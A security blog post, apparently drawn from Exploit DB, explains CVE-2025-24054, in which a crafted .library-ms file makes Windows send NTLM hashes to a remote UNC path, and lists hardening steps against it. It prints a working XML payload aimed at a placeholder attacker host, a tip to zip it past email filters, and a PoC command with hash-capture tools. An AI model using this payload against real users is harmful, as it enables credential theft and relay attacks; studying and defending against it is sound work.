• Posted by: Eng. Donya Bino
• February 10, 2026

Windows NTLM Hash Leak via .library-ms Spoofing

Windows NTLM hash disclosure/relay CVE-2025-24054 exploits how Windows Explorer handles a specially crafted library management file (.library-ms). When a user attempts to open or import a .library-ms file (which may be contained in email attachments, on USB drives, or downloaded from an unauthorized website), Windows will automatically attempt to connect to the UNC path specified within the XML structure of the .library-ms file.

This attempt establishes an NTML authentication connection to the attacker's server, and in doing so, exposes the user's Net-NTLMv2 hash (an older configuration may also expose an NTLMv1 hash). The exposed hash may then be used to crack the password or relay the password in real-time against other servers within the same domain.

The proof-of-concept (PoC) script created by Beatriz Fresno Naumova and dated October 6, 2025, generates a minimal yet functional .library-ms file that has been suitably zipped. This PoC script implements a clean and responsible manner to conduct red-team testing or conduct proof-of-concept demonstrations.

Exploit Explanation (Steps)
1. Make a very small XML file according to the Windows Library description schema:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\attacker-ip\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

2. Name it something.library-ms and compress it into a ZIP file (to avoid most email filtering mechanisms that would reject .library-ms).

3. After the victim double-clicks on the ZIP file after extracting it, opening the .library-ms file from the ZIP, (or importing the file via "Add a Location" in Explorer), the Windows operating system will:
a) Parse the XML.
b) Attempt to enumerate/connect to the provided UNC path.
c) Send an NTLM negotiate packet → attacker captures the NTLM hash.

4. No code execution or privilege escalation occurs on the victim machine, just a disclosure of credential data.

Real-World Impact 
1. Relay attacks are still possible against systems using NTLMv1 or v2 (many legacy Windows environments), file shares, or older versions of Exchange and ADCS servers.
2. Cracking NTLMv2 hashes is possible using modern high-end GPU hardware, especially if the passwords for those accounts are weak, easily guessable, or reused.
3. High-value targets include domain administrators, service accounts and any users with access to sensitive shared resources.
4. Delivery methods include spear-phishing (typically the most common delivery method), watering-hole sites hosting the ZIP file, or via malicious documents that contain OLE objects pointing back to the library file.

In 2025 Microsoft released numerous cumulative updates that have updated the behavior related to the vulnerabilities people have previously exploited, namely KB5044284 and future updates by improving how untrusted library files are handled in Explorer (additional blocking and improved warning messages). 

The behavior for NTLM negotiation over UNC paths remains unchanged as intended; thus even after being patched, systems still expose NTLM hashes via malicious UNC connections if an organization can be tricked into doing so.

Best Practices for hardening and mitigating attacks
1. If possible, disable NTLM authentication altogether by using Group Policy to configure Network Security, Restrict NTLM, Outgoing NTLM Traffic to Remote Servers as Deny All.

2. Enable SMB signing on both the client and the server side to help block most NTLM relay vectors.

3. Use Group Policy to Block the use of Legacy NTLM Authentication by configuring Network Security – Restrict NTLM, NTLM Authentication in this Domain as Deny All Domain Accounts.

4. Endpoint Hardening Techniques
a. Microsoft Defender Attack Surface Reduction (ASR) Rule – Block Win32 API calls from office macros & Block executable attachment from email client and webmail.
b. Use of AppLocker / WDAC Rules to prevent execution of files from %TEMP% or downloads from ZIP without proper AppLocker / WDAC Rules.

5. User Education: Treat. library-ms files and any ZIP containing a .library-ms file the same as a .lnk or .scf file; they should be viewed with high suspicion.

6. Monitor Network Performance: Look for uncommon SMB/445 connections from any workstations to unknown IPs (e.g., where you see NTLMSSP negotiate messages).

Quick Test (Lab Only)
1. Use the PoC against your own IP (for example, using the command: `python3 poc.py -f test -t 192.168.1.100 -z evil.zip`). 
2. Send the evil zip file to yourself via email or file share.
3. Open the zip file on a Windows 10 or 11 test system.
4. Utilize Responder, ntlmrelayx or Impacket to collect the hashes.

This behavior remains exploitable in many enterprise environments across the globe; particularly older corporate applications that require NTLM to authenticate users, or allow NTLM fallback authentication. Additionally, this attack method is low-noise, high-reward and remains a popular attack method for professional red-teams and financially motivated criminal actors alike.

Source: Exploit DB